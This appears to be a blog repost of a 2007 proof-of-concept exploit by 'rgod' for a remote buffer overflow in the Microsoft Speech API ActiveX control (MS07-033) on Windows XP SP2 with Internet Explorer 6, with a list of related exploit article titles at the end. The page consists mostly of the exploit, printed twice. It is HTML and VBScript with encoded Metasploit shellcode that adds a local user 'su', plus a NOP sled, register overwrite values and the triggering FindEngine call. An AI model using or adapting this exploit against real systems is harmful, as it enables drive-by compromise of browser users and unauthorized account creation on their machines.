Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-19 11:16
435 查看
<!--
6.30 10/06/2007
Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll 4.0.4.2512)
/ DirectSpeechRecognition Module (Xlisten.dll 4.0.4.2512)
remote buffer overflow exploit/ xp sp2 version
both dlls are vulnerable, this is the poc for the first one
worked regardless of boot.ini settings, remotely and
by dragging the html file in the browser window
tested against IE 6
by A. Micalizzi (aka rgod )
this is dedicated to Sara, and greetings to shinnai, a good comrade
***note: this was indipendently discovered by me and Will Dormann during the
same period, documented here:
http://www.kb.cert.org/vuls/id/507433 http://www.microsoft.com/technet/security/Bulletin/MS07-033.mspx
the affected package, http://www.microsoft.com/speech/AppHelp(SAPI4)/sapi4.asp
is still distributed with the kill bit not set
-->
<html>
<object classid='clsid:EEE78591-FE22-11D0-8BEF-0060081841DE' id='DirectSS'></OBJECT>
<script language='vbscript'>
REM metasploit, add a user 'su' with pass 'tzu'
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
eax= unescape("%ff%13")
ebp= unescape("%ff%13")
eip= unescape("%01%0a") : REM jmp to scode, UNICODE expanded
jnk= string(50,unescape("%13"))
suntzu = string(888,"A") + ebp + eip + eax + jnk
bufferI = string(9999999,"X")
bufferII = string(9999999,"Y")
bufferIII = string(9999999,"Z")
bufferIV = string(9999999,"O")
EngineID= string(200000,"b")
MfgName="default"
ProductName="default"
ModeID= string(199544,unescape("%90")) + scode
ModeName= suntzu
LanguageID=1
Dialect="default"
Speaker="default"
Style=1
Gender=1
Age=1
Features=1
Interfaces=1
EngineFeatures=1
RankEngineID=1
RankMfgName=1
RankProductName=1
RankModeID=1
RankModeName=1
RankLanguage=1
RankDialect=1
RankSpeaker=1
RankStyle=1
RankGender=1
RankAge=1
RankFeatures=1
RankInterfaces=1
RankEngineFeatures=1
DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures
</script>
</html>
6.30 10/06/2007
Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll 4.0.4.2512)
/ DirectSpeechRecognition Module (Xlisten.dll 4.0.4.2512)
remote buffer overflow exploit/ xp sp2 version
both dlls are vulnerable, this is the poc for the first one
worked regardless of boot.ini settings, remotely and
by dragging the html file in the browser window
tested against IE 6
by A. Micalizzi (aka rgod )
this is dedicated to Sara, and greetings to shinnai, a good comrade
***note: this was indipendently discovered by me and Will Dormann during the
same period, documented here:
http://www.kb.cert.org/vuls/id/507433 http://www.microsoft.com/technet/security/Bulletin/MS07-033.mspx
the affected package, http://www.microsoft.com/speech/AppHelp(SAPI4)/sapi4.asp
is still distributed with the kill bit not set
-->
<html>
<object classid='clsid:EEE78591-FE22-11D0-8BEF-0060081841DE' id='DirectSS'></OBJECT>
<script language='vbscript'>
REM metasploit, add a user 'su' with pass 'tzu'
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
eax= unescape("%ff%13")
ebp= unescape("%ff%13")
eip= unescape("%01%0a") : REM jmp to scode, UNICODE expanded
jnk= string(50,unescape("%13"))
suntzu = string(888,"A") + ebp + eip + eax + jnk
bufferI = string(9999999,"X")
bufferII = string(9999999,"Y")
bufferIII = string(9999999,"Z")
bufferIV = string(9999999,"O")
EngineID= string(200000,"b")
MfgName="default"
ProductName="default"
ModeID= string(199544,unescape("%90")) + scode
ModeName= suntzu
LanguageID=1
Dialect="default"
Speaker="default"
Style=1
Gender=1
Age=1
Features=1
Interfaces=1
EngineFeatures=1
RankEngineID=1
RankMfgName=1
RankProductName=1
RankModeID=1
RankModeName=1
RankLanguage=1
RankDialect=1
RankSpeaker=1
RankStyle=1
RankGender=1
RankAge=1
RankFeatures=1
RankInterfaces=1
RankEngineFeatures=1
DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures
</script>
</html>
相关文章推荐
- Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
- Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)
- BaoFeng ActiveX OnBeforeVideoDownload() Remote BOF Exploit
- Defeating Microsoft Windows XP SP2 Heap protection
- Microsoft Windows XP SP2 With Update 200801 bida[WMZ] 2008贺岁安装版
- ActiveX 控件“Microsoft Chart Control 6.0(sp4)(OLEDB)"不能例示, 因为它需要一个设计时间许可
- 尝试运行"shell32.dll,Control_RunDLL "C:/Program Files/Common Files/Microsoft Shared/Speech/sapi.cpl","时发生意外
- 在QML中调用symbian remote control API 控制音量键
- DameWare Mini Remote Control Server Local SYSTEM Exploit
- Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
- WEB项目使用远程桌面,Embedding the Remote Desktop ActiveX Control in a Web Page
- XlightFTP Server v3.7.0 Remote Root BOF Exploit
- Is the Quartus® II software compatible with Microsoft Windows XP SP2
- C++ Builder 2010利用microsoft speech api 5.1实现语音朗读
- Microsoft Windows XP SP2 With Update 200801 bida[WMZ] 2008贺岁安装版
- 使用微软的语音识别引擎Microsoft Speech API进行语音控制
- Activex控件不能例示 ActiveX 控件“Microsoft Chart Control 6.0(sp4)(OLEDB)"不能例示的解决办法
- Microsoft Speech API 5.3 Text-to-Speech Tutorial
- Display Microsoft Terminal Services ActiveX Control (or Microsoft RDP Client Control
- XP SP2和Windows Server 2003 SP1下允许在本地运行包含ActiveX内容的方法